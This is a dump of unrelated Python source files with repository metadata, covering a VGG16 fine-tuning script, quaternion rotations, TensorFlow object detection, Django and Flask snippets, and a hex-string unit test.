### Loading Pre-Trained Model
##########################
model = models.vgg16(pretrained=True)
##########################
### Freezing Model
##########################
for param in model.parameters():
param.requires_grad = False
model.classifier[3].requires_grad = True
model.classifier[6] = nn.Sequential(
nn.Linear(4096, 512),
nn.ReLU(),
nn.Dropout(0.5),
nn.Linear(512, NUM_CLASSES))
##########################
### Training as usual
##########################
model = model.to(DEVICE)
optimizer = torch.optim.Adam(model.parameters())
def compute_accuracy(model, data_loader):
model.eval()
correct_pred, num_examples = 0, 0
for i, (features, targets) in enumerate(data_loader):
features = features.to(DEVICE)
targets = targets.to(DEVICE)
logits = model(features)
_, predicted_labels = torch.max(logits, 1)
num_examples += targets.size(0)
correct_pred += (predicted_labels == targets).sum()
return correct_pred.float() / num_examples * 100
def compute_epoch_loss(model, data_loader):
model.eval()
curr_loss, num_examples = 0., 0
with torch.no_grad():
for features, targets in data_loader:
features = features.to(DEVICE)
targets = targets.to(DEVICE)
logits = model(features)
loss = F.cross_entropy(logits, targets, reduction='sum')
num_examples += targets.size(0)
curr_loss += loss
curr_loss = curr_loss / num_examples
return curr_loss
start_time = time.time()
for epoch in range(num_epochs):
model.train()
for batch_idx, (features, targets) in enumerate(train_loader):
features = features.to(DEVICE)
targets = targets.to(DEVICE)
### FORWARD AND BACK PROP
logits = model(features)
cost = F.cross_entropy(logits, targets)
optimizer.zero_grad()
cost.backward()
### UPDATE MODEL PARAMETERS
optimizer.step()
### LOGGING
if not batch_idx % 50:
print('Epoch: %03d/%03d | Batch %04d/%04d | Cost: %.4f'
% (epoch + 1, num_epochs, batch_idx,
len(train_loader), cost))
model.eval()
with torch.set_grad_enabled(False): # save memory during inference
print('Epoch: %03d/%03d | Train: %.3f%% | Loss: %.3f' % (
epoch + 1, num_epochs,
compute_accuracy(model, train_loader),
compute_epoch_loss(model, train_loader)))
print('Time elapsed: %.2f min' % ((time.time() - start_time) / 60))
print('Total Training Time: %.2f min' % ((time.time() - start_time) / 60))
with torch.set_grad_enabled(False): # save memory during inference
print('Test accuracy: %.2f%%' % (compute_accuracy(model, test_loader))
##########################
### Training as usual
##########################
import matplotlib.pyplot as plt
classes = ('plane', 'car', 'bird', 'cat',
'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
for batch_idx, (features, targets) in enumerate(test_loader):
features = features
targets = targets
break
logits = model(features.to(DEVICE))
_, predicted_labels = torch.max(logits, 1)
def unnormalize(tensor, mean, std):
for t, m, s in zip(tensor, mean, std):
t.mul_(s).add_(m)
return tensor
n_images = 10
fig, axes = plt.subplots(nrows=1, ncols=n_images,
sharex=True, sharey=True, figsize=(20, 2.5))
orig_images = features[:n_images]
for i in range(n_images):
curr_img = orig_images[i].detach().to(torch.device('cpu'))
curr_img = unnormalize(curr_img,
torch.tensor([0.485, 0.456, 0.406]),
torch.tensor([0.229, 0.224, 0.225]))
curr_img = curr_img.permute((1, 2, 0))
axes[i].imshow(curr_img)
axes[i].set_title(classes[predicted_labels[i]])
|
[
"[email protected]"
] | |
57bfefceefd25252047dcd608dff497f0c347b82
|
988dd821269be12c2f56f62b0c35546fd3050537
|
/python/quaternions/rotations.py
|
852c8839c1435519fcbc0675bd055c4d8af732b7
|
[] |
no_license
|
gdiazh/adcs_models
|
fb19f541eeb9b01ae49ec98719c508d084e4fd7a
|
51d0829cc777d2e345e4fabe406ec7f54e661117
|
refs/heads/master
| 2020-03-28T13:04:56.174852 | 2018-09-28T22:08:25 | 2018-09-28T22:08:25 | 148,364,081 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,050 |
py
|
#!/usr/bin/python
__author__ = 'gdiaz'
import matplotlib as mpl
from plotVectors import PlotVectors
import numpy as np
class Rotation(object):
def __init__(self):
self.vectors = PlotVectors()
self.a = [0, 0, 0]
def rotate_z(self, a, yaw):
Az = np.matrix([[np.cos(yaw), -np.sin(yaw), 0],
[np.sin(yaw), np.cos(yaw), 0],
[0, 0, 1]])
a_ = np.matrix([[a[0]],
[a[1]],
[a[2]]])
u = Az*a_
return [u.item(0), u.item(1), u.item(2)]
def rotate_frame_z(self, I, J, K, yaw):
Az = np.matrix([[np.cos(yaw), np.sin(yaw), 0],
[-np.sin(yaw), np.cos(yaw), 0],
[0, 0, 1]])
I_ = np.matrix([I[0], I[1], I[2]])
J_ = np.matrix([J[0], J[1], J[2]])
K_ = np.matrix([K[0], K[1], K[2]])
i_ = I_*Az
j_ = J_*Az
k_ = K_*Az
i = [i_.item(0), i_.item(1), i_.item(2)]
j = [j_.item(0), j_.item(1), j_.item(2)]
k = [k_.item(0), k_.item(1), k_.item(2)]
return [i, j, k]
def vectorRotationTest(self):
# Calcs
p1 = [2, 0, 0]
yaw = 90*np.pi/180
p1_rot = self.rotate_z(p1, yaw)
print p1_rot
# Plot
self.vectors.plotAxes()
self.vectors.config()
self.vectors.plot(p1)
self.vectors.plot(p1_rot)
self.vectors.show()
def frameRotationTest(self):
# Calcs
I = [1, 0, 0]
J = [0, 1, 0]
K = [0, 0, 1]
yaw = 45*np.pi/180
ijk = self.rotate_frame_z(I, J, K, yaw)
print ijk
# Plot
self.vectors.plotAxes()
self.vectors.config()
self.vectors.plot(ijk[0])
self.vectors.plot(ijk[1])
self.vectors.plot(ijk[2])
self.vectors.show()
def get_qT(self, yawT): #Return quaternion target given yaw target
AT = np.matrix([[np.cos(yawT), np.sin(yawT), 0],
[-np.sin(yawT), np.cos(yawT), 0],
[0, 0, 1]])
q4 = 0.5*np.sqrt(1+AT[0,0]+AT[1,1]+AT[2,2])
q1 = 0.25*(AT[1,2]-AT[2,1])/q4
q2 = 0.25*(AT[2,0]-AT[0,2])/q4
q3 = 0.25*(AT[0,1]-AT[1,0])/q4
return [q4, q1, q2, q3]
def get_qE_(self, qT, qS):
qT_ = np.matrix([[qT[0], qT[3], -qT[2], qT[1]],
[-qT[3], qT[0], qT[1], qT[2]],
[qT[2], -qT[1], qT[0], qT[3]],
[-qT[1], -qT[2], -qT[3], qT[0]]])
qS_ = np.matrix([[-qS[1]],
[-qS[2]],
[-qS[3]],
[qS[0]]])
qE = qT_*qS_
return [qE.item(0), qE.item(1), qE.item(2), qE.item(3)]
def get_qE(self, yawT, qS):
qT = self.get_qT(yawT)
qE = self.get_qE_(qT, qS)
return qE
if __name__ == '__main__':
rotation = Rotation()
# Test Example
# rotation.vectorRotationTest()
rotation.frameRotationTest()
|
[
"[email protected]"
] | |
f281fed287dbd357fea0ab3bb3bd35efc0794cf4
|
51d65cbed3df1e9e3a0d51f79590ee12f88291d1
|
/object_detection/inference_over_image.py
|
0bbbdb9954ca69ffd0cf92de7a7cbb7577cf8043
|
[
"MIT"
] |
permissive
|
apacha/Mensural-Detector
|
f9332c23854263c6a3f89e8b92f3f666f8377ed8
|
05c91204cf268feaae84cd079dbe7a1852fba216
|
refs/heads/master
| 2022-09-23T21:20:53.376367 | 2022-08-31T08:36:35 | 2022-08-31T08:36:35 | 137,372,669 | 12 | 6 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,444 |
py
|
import numpy as np
import tensorflow as tf
import argparse
from PIL import Image
from object_detection.utils import ops as utils_ops, label_map_util, visualization_utils as vis_util
if tf.__version__ < '1.4.0':
raise ImportError('Please upgrade your tensorflow installation to v1.4.* or later!')
def load_image_into_numpy_array(image):
(im_width, im_height) = image.size
return np.array(image.getdata()).reshape(
(im_height, im_width, 3)).astype(np.uint8)
def run_inference_for_single_image(image, graph):
with graph.as_default():
with tf.Session() as sess:
# Get handles to input and output tensors
ops = tf.get_default_graph().get_operations()
all_tensor_names = {output.name for op in ops for output in op.outputs}
tensor_dict = {}
for key in [
'num_detections', 'detection_boxes', 'detection_scores',
'detection_classes', 'detection_masks'
]:
tensor_name = key + ':0'
if tensor_name in all_tensor_names:
tensor_dict[key] = tf.get_default_graph().get_tensor_by_name(tensor_name)
if 'detection_masks' in tensor_dict:
# The following processing is only for single image
detection_boxes = tf.squeeze(tensor_dict['detection_boxes'], [0])
detection_masks = tf.squeeze(tensor_dict['detection_masks'], [0])
# Reframe is required to translate mask from box coordinates to image coordinates and fit the image size.
real_num_detection = tf.cast(tensor_dict['num_detections'][0], tf.int32)
detection_boxes = tf.slice(detection_boxes, [0, 0], [real_num_detection, -1])
detection_masks = tf.slice(detection_masks, [0, 0, 0], [real_num_detection, -1, -1])
detection_masks_reframed = utils_ops.reframe_box_masks_to_image_masks(
detection_masks, detection_boxes, image.shape[0], image.shape[1])
detection_masks_reframed = tf.cast(tf.greater(detection_masks_reframed, 0.5), tf.uint8)
# Follow the convention by adding back the batch dimension
tensor_dict['detection_masks'] = tf.expand_dims(detection_masks_reframed, 0)
image_tensor = tf.get_default_graph().get_tensor_by_name('image_tensor:0')
# Run inference
output_dict = sess.run(tensor_dict, feed_dict={image_tensor: np.expand_dims(image, 0)})
# all outputs are float32 numpy arrays, so convert types as appropriate
output_dict['num_detections'] = int(output_dict['num_detections'][0])
output_dict['detection_classes'] = output_dict['detection_classes'][0].astype(np.uint8)
output_dict['detection_boxes'] = output_dict['detection_boxes'][0]
output_dict['detection_scores'] = output_dict['detection_scores'][0]
if 'detection_masks' in output_dict:
output_dict['detection_masks'] = output_dict['detection_masks'][0]
return output_dict
def load_detection_graph(path_to_checkpoint):
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(path_to_checkpoint, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
return detection_graph
def load_category_index(path_to_labels, number_of_classes):
# Load label map
label_map = label_map_util.load_labelmap(path_to_labels)
categories = label_map_util.convert_label_map_to_categories(label_map,
max_num_classes=number_of_classes,
use_display_name=True)
category_index = label_map_util.create_category_index(categories)
return category_index
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Performs detection over input image given a trained detector.')
parser.add_argument('--inference_graph', dest='inference_graph', type=str, required=True,
help='Path to the frozen inference graph.')
parser.add_argument('--label_map', dest='label_map', type=str, required=True,
help='Path to the label map, which is json-file that maps each category name to a unique number.',
default="mapping.txt")
parser.add_argument('--number_of_classes', dest='number_of_classes', type=int, default=32,
help='Number of classes.')
parser.add_argument('--input_image', dest='input_image', type=str, required=True, help='Path to the input image.')
parser.add_argument('--output_image', dest='output_image', type=str, default='detection.jpg',
help='Path to the output image.')
args = parser.parse_args()
# Path to frozen detection graph. This is the actual model that is used for the object detection.
# PATH_TO_CKPT = '/home/jcalvo/Escritorio/Current/Mensural Detector/mensural-detector/output_inference_graph.pb/frozen_inference_graph.pb'
path_to_frozen_inference_graph = args.inference_graph
path_to_labels = args.label_map
number_of_classes = args.number_of_classes
input_image = args.input_image
output_image = args.output_image
# Read frozen graph
detection_graph = load_detection_graph(path_to_frozen_inference_graph)
category_index = load_category_index(path_to_labels, number_of_classes)
image = Image.open(input_image)
# the array based representation of the image will be used later in order to prepare the
# result image with boxes and labels on it.
image_np = load_image_into_numpy_array(image)
# Actual detection.
output_dict = run_inference_for_single_image(image_np, detection_graph)
# Visualization of the results of a detection.
vis_util.visualize_boxes_and_labels_on_image_array(
image_np,
output_dict['detection_boxes'],
output_dict['detection_classes'],
output_dict['detection_scores'],
category_index,
instance_masks=output_dict.get('detection_masks'),
use_normalized_coordinates=True,
line_thickness=2)
Image.fromarray(image_np).save(output_image)
|
[
"[email protected]"
] | |
524db47926d6c1b18a65735cec61aad5f9e91b97
|
d2c163f246d28b8519f8c89de23556e43be91684
|
/www/ad_board/urls.py
|
9309b9dfb201f43c13a2ec3d393148de00aea612
|
[] |
no_license
|
boogiiieee/Iskcon
|
d7a2b8bdc3002ef3306fc5e7ddc577504d8533c9
|
b672dbafee06af3ee6d646c75f442d97133f5ec9
|
refs/heads/master
| 2021-09-04T03:11:06.770094 | 2018-01-15T04:21:36 | 2018-01-15T04:21:36 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 388 |
py
|
# -*- coding: utf-8 -*-
from django.conf.urls.defaults import patterns, include, url
urlpatterns = patterns('ad_board.views',
url(r'^$', 'full', name='ad_board_url'),
url(r'^category/(?P<id>[0-9]+)/$', 'category', name='category_ad_board_url'),
url(r'^(?P<id>[0-9]+)/$', 'item', name='ad_board_item_url'),
url(r'^category/(?P<id>[0-9]+)/add/$', 'add', name='add_ad_board_url'),
)
|
[
"[email protected]"
] | |
198442838c9414d3f62f9b0af071a325589a66ae
|
8840b69e4341f4ed030c8b33151db205b8db3640
|
/flask_minijax.py
|
a5036e1c916ae910ed2af7e28ecdc01b86534110
|
[
"MIT"
] |
permissive
|
FidgetYou/proj3-anagrams
|
b5fe7ccc333bca0895c12590142b9f0e30f10b83
|
86923a696794b7098940023d57aaef679a52b3ac
|
refs/heads/master
| 2021-01-11T01:03:32.507679 | 2016-10-18T01:58:25 | 2016-10-18T01:58:25 | 70,846,302 | 0 | 0 | null | 2016-10-13T20:39:51 | 2016-10-13T20:39:50 | null |
UTF-8
|
Python
| false | false | 1,317 |
py
|
"""
Tiny demo of Ajax interaction
"""
import flask
from flask import request # Data from a submitted form
from flask import url_for
from flask import jsonify # For AJAX transactions
import json
import logging
import argparse # For the vocabulary list
import sys
###
# Globals
###
app = flask.Flask(__name__)
import CONFIG
app.secret_key = CONFIG.secret_key # Should allow using session variables
###
# Pages
###
@app.route("/")
def index():
return flask.render_template('minijax.html')
###############
# AJAX request handlers
# These return JSON to the JavaScript function on
# an existing page, rather than rendering a new page.
###############
@app.route("/_countem")
def countem():
text = request.args.get("text", type=str)
length = len(text)
rslt = { "long_enough": length >= 5 }
return jsonify(result=rslt)
#############
# Run locally
if __name__ == "__main__":
# Standalone.
app.debug = True
app.logger.setLevel(logging.DEBUG)
print("Opening for global access on port {}".format(CONFIG.PORT))
app.run(port=CONFIG.PORT, host="0.0.0.0")
# If we run 'python3 flask_minijax.py, we get the above 'main'.
# If we run 'gunicorn flask_minijax:app', we instead get a
# 'main' inside gunicorn, which loads this file as a module
# and accesses the Flask 'app' object.
#
|
[
"[email protected]"
] | |
6d346848a2eed9d5be67fdb017a17285227f874a
|
bd5a3b59a5ca9f0c0394c8bf90e818c3967778d9
|
/vre/apps/xauth/urls.py
|
2ba5dfc62bf27aafa163e3cf36365c4b0ea01be0
|
[] |
no_license
|
BlickLabs/vre
|
85f377c04406c163464f7ddade7eafb579f1dfb1
|
6f3644fb9295f6355057cfa64a1156a329b4b4b8
|
refs/heads/develop
| 2020-05-22T04:28:31.913667 | 2018-07-06T21:12:14 | 2018-07-06T21:12:14 | 62,763,239 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 297 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from django.conf.urls import url
from . import views
urlpatterns = [
url(regex=r'^login/$',
view=views.LoginView.as_view(),
name='login'),
url(regex=r'^logout/$',
view=views.logout_view,
name='logout'),
]
|
[
"[email protected]"
] | |
de57cedbc86dec255b93ebc77daf153a873f5256
|
1422a57e98aba02321b772d72f8f0ada6d8b8cba
|
/friday/friday-vendor/vendor-scripts/test-resources/scripts/pylib/hue_turn_on_light.py
|
152b15f1a6ee7c7306946bab089ea4f1578d9421
|
[
"MIT"
] |
permissive
|
JonasRSV/Friday
|
e1908a411aa133bc5bd2f383b0a995f7e028092d
|
f959eff95ba7b11525f97099c8f5ea0e325face7
|
refs/heads/main
| 2023-05-15T03:33:21.542621 | 2021-06-12T10:34:50 | 2021-06-12T10:34:50 | 315,309,991 | 7 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 196 |
py
|
import phue
import sys
if __name__ == "__main__":
b = phue.Bridge(config_file_path="credentials.json")
b.set_light(int(sys.argv[1]), parameter={"on": True, "bri": 200}, transitiontime=5)
|
[
"[email protected]"
] | |
c43501f1134f44d9e0c3c38a8ce719ea17e5bbcb
|
3253da5603971958d69df0ed442e3341a8d3bff4
|
/1-Iniciante/1914.py
|
67fa34c039b20ad33bd528808a4ce2d4016000af
|
[] |
no_license
|
CleitonSilvaT/URI_Python
|
1c73ec0852ae87c6138baa148ad8c2cb56bb723e
|
a8510bab2fa8f680b54058fafebff3a2727617d9
|
refs/heads/master
| 2021-06-20T08:18:50.104839 | 2021-05-20T08:59:19 | 2021-05-20T08:59:19 | 213,665,657 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 959 |
py
|
# -*- coding: utf-8 -*-
if __name__ == '__main__':
# Entrada
casos_teste = int(input())
while(casos_teste > 0):
# Entrada
dados = input()
escolha = dados.split(' ')
# nomepessoa1 - escolha[0]
# escolhapessoa1 - escolha[1]
# nomepessoa2 - escolha[2]
# escolhapessoa2 - escolha[3]
# Entrada
valores = input()
numeros = valores.split(' ')
# Calculando soma dos valores
total = int(numeros[0]) + int(numeros[1])
# Identificando se a soma eh PAR ou IMPAR
if((total % 2) == 0):
# Imprimindo o vencedor
if(escolha[1] == 'PAR'):
print(escolha[0])
else:
print(escolha[2])
else:
# Imprimindo o vencedor
if(escolha[1] == 'IMPAR'):
print(escolha[0])
else:
print(escolha[2])
casos_teste -= 1
|
[
"[email protected]"
] | |
b672c87e3458490ceb0e8b3852355a8c15a2c399
|
d1fadc514274711a7986a6b3caaaee7e8d48b4a6
|
/plot_scripts/scratch29.py
|
9b454212d7485e7e1237f495490e6b1a3e2c0169
|
[
"MIT"
] |
permissive
|
lbaiao/sys-simulator-2
|
24d940db6423070818c23b6ffefbc5da4a1030a0
|
94f00d43309fe7b56dac5099bd4024695ba317b6
|
refs/heads/master
| 2021-08-20T08:30:06.864473 | 2021-06-30T10:37:26 | 2021-06-30T10:37:26 | 230,333,523 | 1 | 0 | null | 2021-06-30T10:37:27 | 2019-12-26T22:02:59 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 1,688 |
py
|
import pickle
import matplotlib.pyplot as plt
import numpy as np
filepath = 'D:/Dev/sys-simulator-2/data/scratch29.pickle'
file = open(filepath, 'rb')
data = pickle.load(file)
aux_range = [10,15,20]
action_counts_total = data['action_counts_total']
d2d_spectral_effs = data['d2d_speffs_avg_total']
mue_success_rate = data['mue_success_rate']
equals_counts_total = data['equals_counts_total']
d2d_speffs_avg = list()
for i, d in enumerate(d2d_spectral_effs):
d2d_speffs_avg.append(np.average(d))
fig2, ax1 = plt.subplots()
ax1.set_xlabel('Number of D2D pairs in the RB')
ax1.set_ylabel('D2D Average Spectral Efficiency [bps/Hz]', color='tab:blue')
ax1.plot(d2d_speffs_avg, '.', color='tab:blue')
ax2 = ax1.twinx()
ax2.set_ylabel('MUE Success Rate', color='tab:red')
ax2.plot(mue_success_rate, '.', color='tab:red')
fig2.tight_layout()
xi = list(range(len(aux_range)))
ax = [0,1,2,3,4]
axi = list(range(len(ax)))
for i, c in enumerate(action_counts_total):
if i in aux_range:
plt.figure()
plt.plot(np.mean(c, axis=0)/i*100, '*',label='mean')
plt.plot(np.std(c, axis=0)/i*100, 'x', label='std')
plt.legend()
plt.title(f'N={i}')
plt.xlabel('Action Index')
plt.ylabel('Average Action Ocurrency [%]')
plt.xticks(axi, ax)
mean_equals = np.array([np.mean(c) for c in equals_counts_total])
std_equals = np.array([np.std(c) for c in equals_counts_total])
plt.figure()
plt.plot(mean_equals[aux_range]*100, '*',label='mean')
plt.plot(std_equals[aux_range]*100, 'x', label='std')
plt.legend()
plt.xlabel('Amount of D2D Devices')
plt.ylabel('Average Equal Actions Ocurrency [%]')
plt.xticks(xi, aux_range)
plt.show()
|
[
"[email protected]"
] | |
6e412c2830f0c0210c5542502eff73dfa2776a76
|
1b78ca7f3250ebed418717c6ea28b5a77367f1b8
|
/411.minimum-unique-word-abbreviation/minimum-unique-word-abbreviation.py
|
70887cecba089f780017d17a96ca6739c187979c
|
[] |
no_license
|
JaniceLC/lc-all-solutions
|
ced854f31b94f44c0b03a0677988805e3b9ee718
|
3f2a4ee8c09a8890423c6a22c73f470eccf979a2
|
refs/heads/master
| 2020-04-05T19:53:31.307528 | 2018-11-12T04:18:45 | 2018-11-12T04:18:45 | 157,155,285 | 0 | 2 | null | 2018-11-12T04:13:22 | 2018-11-12T04:13:22 | null |
UTF-8
|
Python
| false | false | 1,290 |
py
|
class Solution(object):
def minAbbreviation(self, target, dictionary):
"""
:type target: str
:type dictionary: List[str]
:rtype: str
"""
def dfs(w, start, res):
res.append(w)
for i in xrange(start, len(w)):
for l in reversed(xrange(1, len(w) - i + 1)):
dfs(w[:i] + [str(l)] + w[i+l:], i + 2, res)
def match(src, dest):
i = 0
for c in src:
if c.isdigit():
jump = int(c)
i += jump
else:
if c != dest[i]:
return False
i += 1
return True
if not dictionary:
return str(len(target))
wordLen = len(target)
res = []
dfs(list(target), 0, res)
res.sort(key=lambda x:len(x))
dictionary = filter(lambda s: len(s) == wordLen, dictionary)
for w in res:
allMiss = True
for d in dictionary:
if match(w, d):
allMiss = False
break
if allMiss:
return "".join(w)
return None
|
[
"[email protected]"
] | |
8cf1337f8036de2054ba11a4c1ef5921ff9e2863
|
641f76328bfeb7e54f0793a18c5b7c00595b98fd
|
/apps/goods/migrations/0015_auto_20181019_1007.py
|
a9bf43d5073534905d8a89c4b1ee68ce1ac10451
|
[
"Apache-2.0"
] |
permissive
|
lianxiaopang/camel-store-api
|
1d16060af92eb01607757c0423377a8c94c3a726
|
b8021250bf3d8cf7adc566deebdba55225148316
|
refs/heads/master
| 2020-12-29T13:23:18.118617 | 2020-02-09T08:38:53 | 2020-02-09T08:38:53 | 238,621,246 | 0 | 0 |
Apache-2.0
| 2020-02-07T14:28:35 | 2020-02-06T06:17:47 |
Python
|
UTF-8
|
Python
| false | false | 1,439 |
py
|
# Generated by Django 2.1.2 on 2018-10-19 02:07
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('goods', '0014_auto_20181011_1646'),
]
operations = [
migrations.AlterModelOptions(
name='goodscategory',
options={'ordering': ('index', '-is_active'), 'verbose_name': '商品类别', 'verbose_name_plural': '商品类别'},
),
migrations.AlterModelOptions(
name='goodtype',
options={'ordering': ('index',), 'verbose_name': '商品规格', 'verbose_name_plural': '商品规格'},
),
migrations.AddField(
model_name='goodscategory',
name='index',
field=models.PositiveSmallIntegerField(default=0, verbose_name='优先级'),
),
migrations.AddField(
model_name='goodscategory',
name='is_active',
field=models.BooleanField(default=True, verbose_name='是否启用'),
),
migrations.AddField(
model_name='goodtype',
name='asset_ratio',
field=models.PositiveSmallIntegerField(default=0, help_text='单位:%', verbose_name='返利比例'),
),
migrations.AddField(
model_name='goodtype',
name='index',
field=models.PositiveSmallIntegerField(default=0, verbose_name='优先级'),
),
]
|
[
"[email protected]"
] | |
d01b1468d7aaf781d587e8b861611e92d26f28dd
|
e8f99a162207cba82d4e0f969d7bcdb2b9d8b522
|
/imooc/python3_shizhan/ten/c1.py
|
6a78a3e875eb35796ea35e07c606f9f44d0ef637
|
[] |
no_license
|
TesterCC/Python3Scripts
|
edb5446278ebf13edb64336001081941ca27d67d
|
58be67e1ffc74ef50289a885aa4ad05f58e2c383
|
refs/heads/master
| 2023-08-30T21:16:38.328045 | 2023-08-17T11:23:08 | 2023-08-17T11:23:08 | 93,401,996 | 6 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 721 |
py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
__author__ = 'MFC'
__time__ = '18/5/2 21:48'
"""
第10章 正则表达式与JSON
正则表达式
JSON XML
正则表达式是一个特殊的字符序列,一个字符串是否与我们所设定的这样的字符序列相匹配。
快速检索文本、实现一些替换文本的操作
1.检查一串数字是否是电话号码
2.检测一个字符串是否符合email
3.把一个文本里指定的单词替换为另外一个单词
如果正则用的6,可以不用很多内置方法
"""
a = 'C|C++|Java|C#|Python|Javascript'
# Python内置函数,用来判断字符串是否包含Python
print(a.index('Python'))
print(a.index('Python') > -1)
print('Python' in a)
|
[
"[email protected]"
] | |
197926393868d21e6ae154a9dd519b9c67bbad9c
|
cd014fae6791f51a9a382f34dbdcee6d61d84e30
|
/64_eqf_fveqf_fvf_fvegf/64.py
|
64fae91ef51cb384faf818ac502876f63733d358
|
[
"Apache-2.0"
] |
permissive
|
ckclark/Hackquest
|
1505f50fc2c735db059205d1c9bbba1832cc5059
|
65ed5fd32e79906c0e36175bbd280d976c6134bd
|
refs/heads/master
| 2021-01-16T19:32:29.434790 | 2015-09-29T13:39:04 | 2015-09-29T13:39:04 | 42,388,846 | 13 | 5 | null | null | null | null |
UTF-8
|
Python
| false | false | 460 |
py
|
lines = [x.strip() for x in open('64.txt').readlines()]
for shift in [16]: #range(len(lines[0])):
out_graph = []
for line in lines:
out_line = []
for i in range(len(line) - shift):
if line[i] == line[i + shift]:
out_line.append(' ')
else:
out_line.append('*')
out_line = ''.join(out_line)
out_graph.append(out_line)
print shift
print '\n'.join(out_graph)
|
[
"[email protected]"
] | |
5920ba78e09eb4f5be44b465dda4879c3b817140
|
1bfebc7e1c95cd3c25024b6b1adbf518e55513bf
|
/src/pykit/strutil/test/test_hex.py
|
111d8a160a9a91f0c53b0653ae2f85d8536d8489
|
[
"MIT"
] |
permissive
|
bsc-s2/ops
|
a9a217a47dad558285ca8064fa29fdff10ab4ad7
|
6fb8ad758b328a445005627ac1e5736f17088cee
|
refs/heads/master
| 2021-06-24T09:32:49.057026 | 2020-11-02T06:50:01 | 2020-11-02T06:50:01 | 123,527,739 | 8 | 0 |
MIT
| 2020-09-03T04:58:26 | 2018-03-02T03:54:20 |
Python
|
UTF-8
|
Python
| false | false | 5,256 |
py
|
#!/usr/bin/env python2
# coding: utf-8
import os
import unittest
from pykit import strutil
from pykit.strutil import Hex
from pykit import ututil
from pykit import utfjson
dd = ututil.dd
class TestHex(unittest.TestCase):
def test_init(self):
byte_length = 3
cases = (
(0, 0),
('000000', 0),
('\0\0\0', 0),
(256**2 + 2*256 + 3, 0x010203),
('010203', 0x010203),
('\1\2\3', 0x010203),
)
for inp, expected in cases:
dd(inp, expected)
c = Hex(inp, byte_length)
self.assertEqual(expected, c.int)
self.assertEqual('%06x' % expected, c)
def test_attr(self):
c = Hex('010203', 3)
self.assertEqual('010203', c.hex)
self.assertEqual('\1\2\3', c.bytes)
self.assertEqual(256**2 + 2*256 + 3, c.int)
self.assertIs('010203', c.hex)
self.assertIsNot('010203', c)
def test_init_invalid(self):
byte_length = 3
cases = (
(256**3-1, None),
(256**3, ValueError),
(-1, ValueError),
('\1\2', ValueError),
('\1\2\3\4', ValueError),
('0102', ValueError),
('01020', ValueError),
('0102030', ValueError),
('01020304', ValueError),
({}, TypeError),
)
for inp, err in cases:
dd(inp, err)
if err is None:
c = Hex(inp, byte_length)
else:
self.assertRaises(err, Hex, inp, byte_length)
def test_named_length(self):
val = 0x010203
cases = (
('crc32', '00010203'),
('Crc32', '00010203'),
('CRC32', '00010203'),
('md5', '00000000000000000000000000010203'),
('Md5', '00000000000000000000000000010203'),
('MD5', '00000000000000000000000000010203'),
('sha1', '0000000000000000000000000000000000010203'),
('Sha1', '0000000000000000000000000000000000010203'),
('SHA1', '0000000000000000000000000000000000010203'),
('sha256', '0000000000000000000000000000000000000000000000000000000000010203'),
('Sha256', '0000000000000000000000000000000000000000000000000000000000010203'),
('SHA256', '0000000000000000000000000000000000000000000000000000000000010203'),
)
for typ, expected in cases:
c = Hex(val, typ)
self.assertEqual(expected, c)
def test_checksum_shortcut(self):
val = 0x010203
self.assertEqual(Hex(val, 'crc32'), Hex.crc32(val))
self.assertEqual(Hex(val, 'md5'), Hex.md5(val))
self.assertEqual(Hex(val, 'sha1'), Hex.sha1(val))
self.assertEqual(Hex(val, 'sha256'), Hex.sha256(val))
def test_prefix(self):
pref = '1234'
cases = (
('crc32', '12340000'),
('md5', '12340000000000000000000000000000'),
('sha1', '1234000000000000000000000000000000000000'),
('sha256', '1234000000000000000000000000000000000000000000000000000000000000'),
)
for typ, expected in cases:
dd('typ:', typ)
c = Hex((pref, 0), typ)
self.assertEqual(expected, c)
self.assertEqual('12340101', Hex((pref, 1), 'crc32'))
def test_str_repr(self):
c = Hex.crc32(1)
self.assertEqual('00000001', str(c))
self.assertEqual("'00000001'", repr(c))
def test_json(self):
c = Hex.crc32(('0002', 0))
rst = utfjson.dump(c)
self.assertEqual('"00020000"', rst)
self.assertEqual(c, utfjson.load(rst))
def test_arithmetic(self):
c = Hex.crc32(5)
self.assertEqual(6, (c+1).int)
self.assertEqual(10, (c*2).int)
self.assertEqual(2, (c/2).int)
self.assertEqual(0, (c/6).int)
self.assertEqual(1, (c % 2).int)
self.assertEqual(25, (c**2).int)
self.assertEqual('00000006', (c+1))
self.assertEqual('0000000a', (c*2))
self.assertEqual('00000002', (c/2))
self.assertEqual('00000000', (c/6))
self.assertEqual('00000001', (c % 2))
self.assertEqual('00000019', (c**2))
self.assertEqual(6, (c + Hex.crc32(1)).int)
# overflow protection
self.assertEqual(0, (c-5).int)
self.assertEqual(0, (c-6).int)
d = Hex.crc32(('', 0xff))
self.assertEqual(d, d+1)
def test_arithmetic_error(self):
c = Hex.crc32(5)
cases = (
[],
(),
{},
'x',
u'我',
)
for inp in cases:
with self.assertRaises(TypeError):
c + inp
with self.assertRaises(TypeError):
c - inp
with self.assertRaises(TypeError):
c * inp
with self.assertRaises(TypeError):
c / inp
with self.assertRaises(TypeError):
c % inp
with self.assertRaises(TypeError):
c ** inp
|
[
"[email protected]"
] | |
50b28d0ed7daa7be97decf477b846c80cd2df47e
|
4f0385a90230c0fe808e8672bb5b8abcceb43783
|
/框架/crawler/scrapy/scrapy_demo/scrapy_demo/spiders/quotes.py
|
8c9928611b92d882b2c0eebf7d5163ee20e145da
|
[] |
no_license
|
lincappu/pycharmlearningproject
|
4084dab7adde01db9fa82a12769a67e8b26b3382
|
b501523e417b61373688ba12f11b384166baf489
|
refs/heads/master
